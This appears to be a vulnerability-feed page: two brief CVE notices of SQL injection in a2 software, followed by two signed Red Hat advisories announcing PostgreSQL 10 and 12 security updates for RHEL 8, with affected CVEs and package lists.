Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in a2 Camera Trap Tracking System allows SQL Injection.This issue affects Camera Trap Tracking System: before 3.1905.



CVE-2023-3386

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in a2 License Portal System allows SQL Injection.This issue affects License Portal System: before 1.48.



CVE-2023-3522

Red Hat Security Advisory 2023-4539-01 - PostgreSQL is an advanced object-relational database management system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: postgresql:10 security update  
Advisory ID:       RHSA-2023:4539-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4539  
Issue date:        2023-08-08  
CVE Names:         CVE-2023-2454 CVE-2023-2455   
=====================================================================

1. Summary:

An update for the postgresql:10 module is now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

PostgreSQL is an advanced object-relational database management system  
(DBMS).

Security Fix(es):

* postgresql: schema_element defeats protective search_path changes  
(CVE-2023-2454)

* postgresql: row security policies disregard user ID changes after  
inlining. (CVE-2023-2455)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

If the postgresql service is running, it will be automatically restarted  
after installing this update.

5. Bugs fixed (https://bugzilla.redhat.com/):

2207568 - CVE-2023-2454 postgresql: schema_element defeats protective search_path changes  
2207569 - CVE-2023-2455 postgresql: row security policies disregard user ID changes after inlining.

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
postgresql-10.23-2.module+el8.8.0+19493+5804baf6.src.rpm

aarch64:  
postgresql-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-contrib-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-contrib-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-debugsource-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-docs-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-docs-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-plperl-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-plperl-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-plpython3-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-plpython3-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-pltcl-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-pltcl-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-server-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-server-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-server-devel-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-server-devel-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-static-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-test-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-test-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-test-rpm-macros-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-upgrade-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-upgrade-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-upgrade-devel-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-upgrade-devel-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm

ppc64le:  
postgresql-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-contrib-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-contrib-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-debugsource-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-docs-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-docs-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-plperl-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-plperl-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-plpython3-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-plpython3-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-pltcl-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-pltcl-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-server-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-server-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-server-devel-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-server-devel-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-static-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-test-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-test-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-test-rpm-macros-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-upgrade-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-upgrade-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-upgrade-devel-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-upgrade-devel-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm

s390x:  
postgresql-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-contrib-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-contrib-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-debugsource-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-docs-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-docs-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-plperl-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-plperl-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-plpython3-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-plpython3-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-pltcl-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-pltcl-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-server-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-server-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-server-devel-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-server-devel-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-static-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-test-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-test-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-test-rpm-macros-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-upgrade-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-upgrade-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-upgrade-devel-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-upgrade-devel-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm

x86_64:  
postgresql-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-contrib-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-contrib-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-debugsource-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-docs-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-docs-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-plperl-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-plperl-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-plpython3-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-plpython3-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-pltcl-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-pltcl-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-server-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-server-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-server-devel-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-server-devel-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-static-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-test-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-test-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-test-rpm-macros-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-upgrade-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-upgrade-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-upgrade-devel-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-upgrade-devel-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-2454  
https://access.redhat.com/security/cve/CVE-2023-2455  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0k9SAAoJENzjgjWX9erEWZwQAJOWdstLJGeVEYwuTlEtXxLz  
mvKaCqsr7YhticWwVKt9eb6L5uFZch7ss+Wdxwj+5rm9jN1EWSbzCoJeiNHaonlJ  
5/XKIVoUUTwfKQ0TJTJCYXxFSzds+ClVcTj/VNk270KdSmS5GbpwrMKlgbqBI7YM  
qtQh0hMZZ7sTL802uU77H+4ocxfFPxLRuZeCZ2U0ULAx7ur3ZVKVNi+rj9hCyPSJ  
2rI9q8LEIZWLTFzs+3kTGCGQlBtJJrv1mQonhoSET3r8UJyujrHQtbpVE8b3MQA4  
X/rqdU6+QxhOtI8WdT1mpbDt9VFCIE5rbhP6vpK7/gK8nxH5yfOLB1nDRKlLCtyF  
qJRxqXxQvcOgsrs5QXOJsaxVrA5A8qdRsjqP+CxKdWRVVIyQ29JXoRq64K3leiQ3  
cR879poIpoh38hkrqmmeHLJqOREbsEbQqL3DCyaN46rjQ5MyWGFTV+7JNW17p+dc  
JC2yUAnU1LTMyND/WFRcgrcwiEAruF9SQMkuaV3qTZOUiafirA0CzkcaJEh9ycxV  
2ehVP4gPTHRNFS8xIvq7Ely/LzmZqV+0834CSU01cg9oeP5Kacd03Y4Rf2cR6ZMO  
j5ykLcGE0SKKkvtmCS4xgzqxPCjoaEG+nps+z7363dFsOpd0kNx/OasRjG999DtD  
WMJ6qw0/JPLVFgEKNMie  
=Njbj  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4539-01

Red Hat Security Advisory 2023-4535-01 - PostgreSQL is an advanced object-relational database management system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: postgresql:12 security update  
Advisory ID:       RHSA-2023:4535-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4535  
Issue date:        2023-08-08  
CVE Names:         CVE-2022-41862 CVE-2023-2454 CVE-2023-2455   
=====================================================================

1. Summary:

An update for the postgresql:12 module is now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

PostgreSQL is an advanced object-relational database management system  
(DBMS).

Security Fix(es):

* postgresql: schema_element defeats protective search_path changes  
(CVE-2023-2454)

* postgresql: row security policies disregard user ID changes after  
inlining. (CVE-2023-2455)

* postgresql: Client memory disclosure when connecting with Kerberos to  
modified server (CVE-2022-41862)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

If the postgresql service is running, it will be automatically restarted  
after installing this update.

5. Bugs fixed (https://bugzilla.redhat.com/):

2165722 - CVE-2022-41862 postgresql: Client memory disclosure when connecting with Kerberos to modified server  
2207568 - CVE-2023-2454 postgresql: schema_element defeats protective search_path changes  
2207569 - CVE-2023-2455 postgresql: row security policies disregard user ID changes after inlining.

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
pg_repack-1.4.6-3.module+el8.5.0+11354+78b3c9c5.src.rpm  
pgaudit-1.4.0-5.module+el8.5.0+11354+78b3c9c5.src.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.5.0+11354+78b3c9c5.src.rpm  
postgresql-12.15-1.module+el8.8.0+19427+d1071523.src.rpm

aarch64:  
pg_repack-1.4.6-3.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
pgaudit-1.4.0-5.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
pgaudit-debuginfo-1.4.0-5.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
pgaudit-debugsource-1.4.0-5.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
postgresql-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-contrib-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-contrib-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-debugsource-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-docs-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-docs-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-plperl-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-plperl-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-plpython3-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-plpython3-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-pltcl-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-pltcl-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-server-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-server-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-server-devel-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-server-devel-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-static-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-test-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-test-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-upgrade-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-upgrade-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-upgrade-devel-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-upgrade-devel-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm

noarch:  
postgresql-test-rpm-macros-12.15-1.module+el8.8.0+19427+d1071523.noarch.rpm

ppc64le:  
pg_repack-1.4.6-3.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
pgaudit-1.4.0-5.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
pgaudit-debuginfo-1.4.0-5.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
pgaudit-debugsource-1.4.0-5.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
postgresql-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-contrib-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-contrib-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-debugsource-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-docs-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-docs-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-plperl-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-plperl-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-plpython3-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-plpython3-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-pltcl-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-pltcl-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-server-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-server-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-server-devel-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-server-devel-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-static-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-test-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-test-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-upgrade-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-upgrade-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-upgrade-devel-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-upgrade-devel-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm

s390x:  
pg_repack-1.4.6-3.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
pgaudit-1.4.0-5.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
pgaudit-debuginfo-1.4.0-5.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
pgaudit-debugsource-1.4.0-5.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
postgresql-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-contrib-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-contrib-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-debugsource-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-docs-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-docs-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-plperl-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-plperl-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-plpython3-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-plpython3-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-pltcl-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-pltcl-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-server-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-server-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-server-devel-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-server-devel-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-static-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-test-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-test-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-upgrade-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-upgrade-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-upgrade-devel-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-upgrade-devel-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm

x86_64:  
pg_repack-1.4.6-3.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
pgaudit-1.4.0-5.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
pgaudit-debuginfo-1.4.0-5.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
pgaudit-debugsource-1.4.0-5.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
postgresql-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-contrib-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-contrib-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-debugsource-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-docs-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-docs-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-plperl-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-plperl-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-plpython3-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-plpython3-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-pltcl-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-pltcl-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-server-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-server-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-server-devel-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-server-devel-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-static-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-test-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-test-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-upgrade-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-upgrade-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-upgrade-devel-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-upgrade-devel-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-41862  
https://access.redhat.com/security/cve/CVE-2023-2454  
https://access.redhat.com/security/cve/CVE-2023-2455  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0k9CAAoJENzjgjWX9erEE1sP+wTqIUW8IoSarpOGvtnKOyF2  
bi5RtyUYPYuhIqaKCK2UsPG3nDm22Icm+BGg4DlyVKm7nDNOEqn9zZ5yVIhhdj6u  
Y3XgfCQ73qIp4S5Kk2/EamjkW+qApav//KwvtYsAKnRSdehnsoPITXyrP6CvNecq  
nDstngk4YXYZmSSWf9+G4qcrW2KYE9ZXb3Y9neDlps+tllMHtCkDll/yovbCsDAl  
TmvUC/rspIlQT0ORUtzbDF6UxbxRNObshQb8eIv/5dEEFi0vhpaBHSEc02qkAmwt  
YEUK6PmOuMnG+t2MmY9qU2JIAWIolhj1mrW+9t0QEtQwnRe3WAdC/u6L6Y8A+Vaq  
su0qGiDIzxucA9GEZaLEwcgFF0oHQGy1bAlosmrfd72J22c1CrGLhUalHX48OC/K  
Uvi1hQjtldMkfjPPcFf1HAQQxdHdmPciYfAGK4cNQtSN2BDTxmXbqZ88MI/K40OZ  
ljQ33r0vAY5JT92wK9H2ywPPua8hvyfwPx3kCRWjkyJRi+pYUlmDMFfnl0bRQPdF  
Kg82S2EgDFm1UJ5+FKQYsG1DiWrpyKn5A2QaNzTdJRSHME7y2AwlrDWyYZs8RRPT  
UMURHrR5A5m0PLrdBTCfHb9HntQ2llqqdzGnD18AcU/gAUBxWfTSR9Xwa9g4QVHQ  
rsj1k41v/v4CYSXYiSOq  
=VOC5  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

